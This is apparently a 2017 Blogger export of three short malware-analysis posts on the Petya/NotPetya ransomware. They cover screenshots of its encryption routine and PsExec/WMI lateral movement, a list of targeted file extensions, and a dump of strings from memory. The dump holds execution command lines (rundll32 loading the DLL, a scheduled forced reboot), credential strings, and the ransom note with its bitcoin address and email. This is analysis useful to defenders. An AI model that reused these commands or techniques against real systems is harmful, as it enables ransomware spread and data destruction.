<br />
<br />
<br />
Provider: MS RSA AES<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0O8IFo9VSQQEKv0wPyqI3vr2ONwB359fIqznM9xxGwrqd1WTdtKAzOjxDLmI-8HXXhmwJWeke3m1On_eExjitmvbeNGIrLU9ZklXCbmGR9AOUUblVPQU1RdrPuOEObSTGzZM6MDadMWAW/s1600/crypt-provider.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0O8IFo9VSQQEKv0wPyqI3vr2ONwB359fIqznM9xxGwrqd1WTdtKAzOjxDLmI-8HXXhmwJWeke3m1On_eExjitmvbeNGIrLU9ZklXCbmGR9AOUUblVPQU1RdrPuOEObSTGzZM6MDadMWAW/s1600/crypt-provider.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="187" data-original-width="1395" height="52" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0O8IFo9VSQQEKv0wPyqI3vr2ONwB359fIqznM9xxGwrqd1WTdtKAzOjxDLmI-8HXXhmwJWeke3m1On_eExjitmvbeNGIrLU9ZklXCbmGR9AOUUblVPQU1RdrPuOEObSTGzZM6MDadMWAW/s400/crypt-provider.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This is where it starts in user-land.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY_p3UssW7vW1gqcxIwzZ5PHXE2kkBLv-AmRd1Ahans6Pe_UAkQ4jILvHlU2lrc6Jg6neVJK6oW0qOE-fNsyTrvCkmP03HHp84_1g3cgF-gto0ENP5BmcuVeIsx6ncWt9w5fbj8p5Kp2Lg/s1600/reapairing.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="475" data-original-width="1475" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY_p3UssW7vW1gqcxIwzZ5PHXE2kkBLv-AmRd1Ahans6Pe_UAkQ4jILvHlU2lrc6Jg6neVJK6oW0qOE-fNsyTrvCkmP03HHp84_1g3cgF-gto0ENP5BmcuVeIsx6ncWt9w5fbj8p5Kp2Lg/s400/reapairing.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKxSCBBzI4raLgFVitx2e6e0iQiMP_VGpFldoQKqyI-GVZbVWqIZBH2ou3Txv5_0mN26MxbABBxdOsDb8Gr4YQPUuPwDBg1nG8KEawAdwFwAa7flzBzjlBimyDfs1r7g-mBaQ8I0qGfAyL/s1600/repairing2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="891" data-original-width="1193" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKxSCBBzI4raLgFVitx2e6e0iQiMP_VGpFldoQKqyI-GVZbVWqIZBH2ou3Txv5_0mN26MxbABBxdOsDb8Gr4YQPUuPwDBg1nG8KEawAdwFwAa7flzBzjlBimyDfs1r7g-mBaQ8I0qGfAyL/s400/repairing2.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
All the familiar messages.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBnVt1B0gLOqcsV_4nQ2Saq8TlHzTIuMRiY4uqHyM1-U89WGHbfNwPaIhErFNz38KQa-t7d50d1iC-u6QI1rLwnKg9qOr7tBVvjkeJf2_nQP1EjKRbg3DHUTCh4Fs-j6BrvRJNrtik5PQ3/s1600/notes6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="277" data-original-width="1281" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBnVt1B0gLOqcsV_4nQ2Saq8TlHzTIuMRiY4uqHyM1-U89WGHbfNwPaIhErFNz38KQa-t7d50d1iC-u6QI1rLwnKg9qOr7tBVvjkeJf2_nQP1EjKRbg3DHUTCh4Fs-j6BrvRJNrtik5PQ3/s400/notes6.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAg0dw7LNQz7z1Qd6MwywBte2E7pk8nBkpXKpuQKaX2m4MnxfG9GZIVc7cGO8odTnEAGcr2JTstyI-hOEK_ZuvVfv43QhFHgkCuJI8_FdG4kXnRg4jlvYtob7XbekoNEcnweOEYq3fxFzJ/s1600/notes4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="607" data-original-width="1183" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAg0dw7LNQz7z1Qd6MwywBte2E7pk8nBkpXKpuQKaX2m4MnxfG9GZIVc7cGO8odTnEAGcr2JTstyI-hOEK_ZuvVfv43QhFHgkCuJI8_FdG4kXnRg4jlvYtob7XbekoNEcnweOEYq3fxFzJ/s400/notes4.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip04rT44N4JRrqV-xasRmCnaFpV3XIKJ25MdmlkzV6mRcMdOeXzAlb7UfsIOJSno8h0tXuuNfS274t8gXx3r1VDbHW-9fhGkfBl-PukCh6Hq1QugQlsIUOTMIiDd2jA0E6-OenD2yuBb3z/s1600/notes5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="617" data-original-width="1181" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip04rT44N4JRrqV-xasRmCnaFpV3XIKJ25MdmlkzV6mRcMdOeXzAlb7UfsIOJSno8h0tXuuNfS274t8gXx3r1VDbHW-9fhGkfBl-PukCh6Hq1QugQlsIUOTMIiDd2jA0E6-OenD2yuBb3z/s400/notes5.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Tyoubl9O_A2WKjwXpAvH0Zi6GWYcdqd3_SnFwFlR9vtllzd8HhGCiV4P-m_RiLNAEpd544bjYxG6nIy8mjSw_iYmkbtxon311QF4Ux3PZsTwFqrcZ80sJnMAAWfQvhOsNWJD1FrvcxiN/s1600/repairing3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="679" data-original-width="1199" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Tyoubl9O_A2WKjwXpAvH0Zi6GWYcdqd3_SnFwFlR9vtllzd8HhGCiV4P-m_RiLNAEpd544bjYxG6nIy8mjSw_iYmkbtxon311QF4Ux3PZsTwFqrcZ80sJnMAAWfQvhOsNWJD1FrvcxiN/s400/repairing3.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
And here's all the WMI stuff.</div>
<div class="separator" style="clear: both; text-align: left;">
Also, note that rundll32.exe is called by '%s' - perfc.dat in this case. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimzT6tMmNk-d9vDPP85oxn7M8YemIpDvsanCIGiGlZ2QnQHN_IND26Z0tbHeL-Ie3YqQQjXNAOCBFBCBinCfEJgRhUIUxDRu6HuciGTLrUe3SEckwdiSbr4_83RQmHe4iF62sqSz5vA-QO/s1600/dllhost-psexec-execution2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="563" data-original-width="1433" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimzT6tMmNk-d9vDPP85oxn7M8YemIpDvsanCIGiGlZ2QnQHN_IND26Z0tbHeL-Ie3YqQQjXNAOCBFBCBinCfEJgRhUIUxDRu6HuciGTLrUe3SEckwdiSbr4_83RQmHe4iF62sqSz5vA-QO/s400/dllhost-psexec-execution2.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Running PSExec on the entire subnet, after accepting the EULA of course :) <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxcUNAEaYIakk-Gnn-aET8UY0OtovLqQ5QIlW8fOhyphenhyphenY9AuEHZscndvfyB8CZINXm-2wgP5pX5ba9KI4Nb6jhEWSDj4oXaFhpeQT45tOAoxBWZVwNNJcKWs-oUzf_pYm4QTxt6u801-7D1L/s1600/dllhost-psexec-execution.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxcUNAEaYIakk-Gnn-aET8UY0OtovLqQ5QIlW8fOhyphenhyphenY9AuEHZscndvfyB8CZINXm-2wgP5pX5ba9KI4Nb6jhEWSDj4oXaFhpeQT45tOAoxBWZVwNNJcKWs-oUzf_pYm4QTxt6u801-7D1L/s1600/dllhost-psexec-execution.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="623" data-original-width="1233" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxcUNAEaYIakk-Gnn-aET8UY0OtovLqQ5QIlW8fOhyphenhyphenY9AuEHZscndvfyB8CZINXm-2wgP5pX5ba9KI4Nb6jhEWSDj4oXaFhpeQT45tOAoxBWZVwNNJcKWs-oUzf_pYm4QTxt6u801-7D1L/s400/dllhost-psexec-execution.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
Extensions to be encrypted.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg38HX1eIBjFb7iaoNKJoKkbdk95HRgGbHz5RRjvEX3zjF-hzs72WyQv2LBJsaeWPqgJDlRGfO9fukVW2GIl61WxJ1D7jRjHRmMQhhgFC2BbR6w9slb3NWdWX_36lhBPrSVfuE-zy55eY34/s1600/keys.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="321" data-original-width="1191" height="107" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg38HX1eIBjFb7iaoNKJoKkbdk95HRgGbHz5RRjvEX3zjF-hzs72WyQv2LBJsaeWPqgJDlRGfO9fukVW2GIl61WxJ1D7jRjHRmMQhhgFC2BbR6w9slb3NWdWX_36lhBPrSVfuE-zy55eY34/s400/keys.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
Looks out for the extensions it wants to encrypt (hard-coded, different to the ones seen earlier in Petya mid-2016).</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi54pxN_vaZN1XfrfqX73nxoWPB3aZXvro9z5AE7X9enDegN2vIl5iBe7eBSz0EhCG14goWUeAW-QPeOB7PlRIwpv1TqM8GWNOvEDOacaWq9I3qyTugxbDaVWv6YIf7-RIjlOhemjTmp0fD/s1600/7-extentions.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="253" data-original-width="911" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi54pxN_vaZN1XfrfqX73nxoWPB3aZXvro9z5AE7X9enDegN2vIl5iBe7eBSz0EhCG14goWUeAW-QPeOB7PlRIwpv1TqM8GWNOvEDOacaWq9I3qyTugxbDaVWv6YIf7-RIjlOhemjTmp0fD/s400/7-extentions.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiKkEIayXH1xstzDnFFHzD0Hmc7RcmaEG-6-ZOKuATtPKTVDJe0E2Y4X_dqxtmWU1eD3VL05Yu9prPyhNa3Q1Ba_8K1M9Iw7J6SUVMIHZFR8lEQv_naDkoCnxIsJb2HuylQrLpumVpLtQK/s1600/7a-ext.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="463" data-original-width="1035" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiKkEIayXH1xstzDnFFHzD0Hmc7RcmaEG-6-ZOKuATtPKTVDJe0E2Y4X_dqxtmWU1eD3VL05Yu9prPyhNa3Q1Ba_8K1M9Iw7J6SUVMIHZFR8lEQv_naDkoCnxIsJb2HuylQrLpumVpLtQK/s400/7a-ext.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Encryption part.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjre-8Q3CSoLcn0qZJx_fz2M3loox0fQtSpWzGAWtdjXHjsQP8Wb6Tu7bX_J470ZlBd2t5oZKC2X6bfoDWU8NLeCdm5eJpFaw5oeXSQvnXzCZFPI7weT5xJwZGxicUeCUj9fb44L3NaLRB/s1600/2-crypt-aqcuire-context.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="441" data-original-width="1091" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjre-8Q3CSoLcn0qZJx_fz2M3loox0fQtSpWzGAWtdjXHjsQP8Wb6Tu7bX_J470ZlBd2t5oZKC2X6bfoDWU8NLeCdm5eJpFaw5oeXSQvnXzCZFPI7weT5xJwZGxicUeCUj9fb44L3NaLRB/s400/2-crypt-aqcuire-context.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSY9W6tYz_8ynbWkAYaxXZtyYSgWfAfbPyLZ-Y48Wz8TD6upzm37ZVwcLBuXlBtV9MsStUyat6t_po5c9_hWNYFD5uU8hw-aHU8xZh9vKcp1tJy5D4D_vWGfQ4DN8SGF_n_g3_p8kqaI-n/s1600/3-crypt-random.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="409" data-original-width="995" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSY9W6tYz_8ynbWkAYaxXZtyYSgWfAfbPyLZ-Y48Wz8TD6upzm37ZVwcLBuXlBtV9MsStUyat6t_po5c9_hWNYFD5uU8hw-aHU8xZh9vKcp1tJy5D4D_vWGfQ4DN8SGF_n_g3_p8kqaI-n/s400/3-crypt-random.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKyxgjw_EGYdgzUcZ4veP-xWxHUUpJX-Z7aqE0TRKUhTbTPIYOA1qokpCQeDtGOdvasqTdlj5x-yw1iDra1dCAfULZBIuppt8xtdLirSZlcLa_DUOCP5NGQYTJ7lz1LMqUdgV24qYeStzB/s1600/4-crypt-release.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="457" data-original-width="1287" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKyxgjw_EGYdgzUcZ4veP-xWxHUUpJX-Z7aqE0TRKUhTbTPIYOA1qokpCQeDtGOdvasqTdlj5x-yw1iDra1dCAfULZBIuppt8xtdLirSZlcLa_DUOCP5NGQYTJ7lz1LMqUdgV24qYeStzB/s400/4-crypt-release.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
And here are all the encryption functions that are called.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwpV9BBddqsnGsqrHGw3BkHe-4HhRC2YYwmcmwV7oxzZABnWh3mMMgWs-w9-qfKUWtKwYJUKKCtvrGR3eRet4zTXmyHSs71XGoRFAAW1YyXX41Cjq2PdBcjG_gfkihBwUwh37pww6-tQFK/s1600/complete-encr-routine.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1077" data-original-width="711" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwpV9BBddqsnGsqrHGw3BkHe-4HhRC2YYwmcmwV7oxzZABnWh3mMMgWs-w9-qfKUWtKwYJUKKCtvrGR3eRet4zTXmyHSs71XGoRFAAW1YyXX41Cjq2PdBcjG_gfkihBwUwh37pww6-tQFK/s400/complete-encr-routine.PNG" width="263" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Like I said earlier, this is a quick look into the malware not a detailed analysis. But it should give you some insight into how it works. </div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-12392103148636399012017-06-27T21:01:00.000-07:002017-06-27T21:01:15.471-07:00Petya extentions targetted<div dir="ltr" style="text-align: left;" trbidi="on">
.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb<br />
.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql<br />
.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-584753087503969012017-06-27T20:02:00.000-07:002017-06-27T20:02:36.961-07:00Petya Mem Strings<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-size: x-small;">Some interesting strigns pulled from the Petya executble:</span><br />
<span style="font-size: x-small;"> </span><br />
<br />
<span style="font-size: x-small;"><assemblyIdentity</span><br />
<span style="font-size: x-small;"> version="5.1.0.0"</span><br />
<span style="font-size: x-small;"> processorArchitecture="x86"</span><br />
<span style="font-size: x-small;"> name="Microsoft.Windows.Shutdown"</span><br />
<span style="font-size: x-small;"> type="win32"</span><br />
<span style="font-size: x-small;"><description>Windows Shutdown and Annotation Tool</description></span><br />
<span style="font-size: x-small;"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"></span><br />
<span style="font-size: x-small;"> <security></span><br />
<span style="font-size: x-small;"> <requestedPrivileges></span><br />
<span style="font-size: x-small;"> <requestedExecutionLevel</span><br />
<span style="font-size: x-small;"> level="asInvoker"</span><br />
<span style="font-size: x-small;"> uiAccess="false"</span><br />
<span style="font-size: x-small;"> /></span><br />
<span style="font-size: x-small;"> </requestedPrivileges></span><br />
<span style="font-size: x-small;"> </security></span><br />
<span style="font-size: x-small;"></trustInfo></span><br />
<span style="font-size: x-small;"></assembly></span><br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;">00026671-00002512,dllhost.dat,"%WINDIR%\dllhost.dat",2512,2880,2017-6-27.07:45:34.603,"%WINDIR%\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin.dll",#1 10 "%OSUSER%-PC\%OSUSER%:123456"""</span><br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;">c:\src\Pstools\psexec\EXE\Release\psexec.pdb</span><br />
<span style="font-size: x-small;">c:\src\Pstools\psexec\SVC\Release\psexesvc.pdb</span><br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;">Direct PsExec to run the application on the remote</span><br />
<span style="font-size: x-small;">computer or computers specified. If you omit the computer</span><br />
<span style="font-size: x-small;">ComputerName</span><br />
<span style="font-size: x-small;">CONIN$</span><br />
<span style="font-size: x-small;">Connecting to 192.168.xx.xx...</span><br />
<span style="font-size: x-small;">Connecting to 192.168.xx.xx...</span><br />
<span style="font-size: x-small;"> </span><br />
<span style="font-size: x-small;">Starting PsExec service on 192.168.xx.xx...</span><br />
<span style="font-size: x-small;"> </span><br />
<span style="font-size: x-small;">Connecting with PsExec service on 192.168.xx.xx...</span><br />
<span style="font-size: x-small;"> </span><br />
<span style="font-size: x-small;">Starting %WINDIR%\System32\rundll32.exe on 192.168.xx.xx...</span><br />
<span style="font-size: x-small;">Connecting with PsExec service on 192.168.xx.xx...</span><br />
<span style="font-size: x-small;">ConnectNamedPipe</span><br />
<span style="font-size: x-small;">CONOUT$</span><br />
<span style="font-size: x-small;">ControlService</span><br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;">that file and print sharing services are enabled on %s.</span><br />
<span style="font-size: x-small;">the password is transmitted in clear text to the remote system.</span><br />
<span style="font-size: x-small;">This application has requested the Runtime to terminate it in an unusual way.</span><br />
<span style="font-size: x-small;">Please contact the application's support team for more information.</span><br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;">Usage: psexec [\\computer[,computer2[,...] | @file]][-u user [-p psswd][-n s][-l][-s|-e][-x][-i [session]][-c [-f|-v]][-w directory][-d][-<priority>][-a n,n,...] cmd [arguments]</span><br />
<span style="font-size: x-small;">UseDelayedAcceptance</span><br />
<br />
<br />
<span style="font-size: x-small;">00024659-00002880,rundll32.exe,"%WINDIR%\System32\rundll32.exe",2880,2292,2017-6-27.06:42:15.996,"C:\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin.dll",#1""<br />1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX<br />2. Send your Bitcoin wallet ID and personal installation key to e-mail<br />[j j <br />\Sessions\1\Windows\ApiPort<br />\ThemeApiPort<br />AddressFamily<br />AppData<br />AQIAAA5mAAAApAAA6vAGjmKL1o/z1WoWFbD8HoXQxvta/l23/sisYXlY3R/b2LYb<br />GBVOO2YNwJuwEsKdn6WHHKMbDnT/orfba9XaLwwelJeehFIraOnQSXSuVih7CWRJ<br />AuthenticodeEnabled<br />AutodialDLL</span><br />
<br />
<span style="font-size: x-small;">DhcpDomain<br />DhcpNameServer<br />Dhcpv6Domain<br />Disable<br />DisableBranchCache<br />DisableEngine<br />DisableImprovedZoneCheck<br />DisableLocalOverride<br />DisableMetaFiles<br />DisableUserModeCallbackFilter<br />DisplayString<br />dllhost.dat</span><br />
<br />
<span style="font-size: x-small;">Enabled<br />EnableDhcp<br />EnableLinkedConnections<br />EnablePunycode<br />Export<br />FE04.tmp<br />FipsAlgorithmPolicy<br />HelperDllName<br />Hostname<br />Image Path<br />l your files safely and easily. All you<br /> need to do is submit the payment and purchase the decryption key.<br /> Please follow the instructions:<br /> 1. Send $300 worth of Bitcoin to following address:</span><br />
<br />
<span style="font-size: x-small;">Ooops, your important files are encrypted.<br />If you see this text, then your files are no longer accessible, because<br />they have b<br />PackedCatalogItem<br />PageAllocatorSystemHeapIsPrivate</span><br />
<br />
<span style="font-size: x-small;">TROY ALL OF YOUR DATA! PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED<br /> IN!<br />Type<br />UseDelayedAcceptance<br />UseHostnameAsAlias<br />UseOldHostResolutionOrder<br />Users<br />Version<br />Webclient<br />Windows<br />WinHttpSettings<br />WinSock 2.0 Provider ID<br />WinSock_Registry_Version<br />wowsmith123456@posteo.net.</span><br />
<br />
<span style="font-size: x-small;">00026129-00001968,FE04.tmp,"%TEMP%\FE04.tmp",1968,2880,2017-6-27.06:45:10.817,"%TEMP%\FE04.tmp" \\.\pipe\{E532AB34-D5C5-4AA8-9511-A05572AE75BC}""<br />%OSUSER%-PC\%OSUSER%:123456</span><br />
<br />
<span style="font-size: x-small;">00026131-00002720,schtasks.exe,"%WINDIR%\System32\schtasks.exe",2720,2724,2017-6-27.06:45:08.804,"" /TR "%WINDIR%\system32\shutdown.exe /r /f" /ST 07:45""<br />(40,4):LogonType:<br />ERROR:<br />ERROR: No mapping between account names and security IDs was done.<br />No mapping between account names and security IDs was done.<br />00026195-00002796,shutdown.exe,"%WINDIR%\System32\shutdown.exe",2796,1820,2017-6-27.06:45:09.425,"%WINDIR%\system32\shutdown.exe" /r /f""<br />0 0(000</span><br />
<br />
<span style="font-size: x-small;">Shutdown and Annotation Tool<br />00026671-00002512,dllhost.dat,"%WINDIR%\dllhost.dat",2512,2880,2017-6-27.07:45:34.603,"%WINDIR%\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin.dll",#1 10 "%OSUSER%-PC\%OSUSER%:123456"""<br />!This program cannot be run in DOS mode.<br />"%WINDIR%\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin.dll",#1 10 "%OSUSER%-PC\%OSUSER%:123456"</span><br />
<br />
<span style="font-size: x-small;">%WINDIR%\System32\rundll32.exe started on 192.168.56.11 with process ID 2996.</span><br />
<br />
<span style="font-size: x-small;"> </span></div>
Unknownnoreply@blogger.com0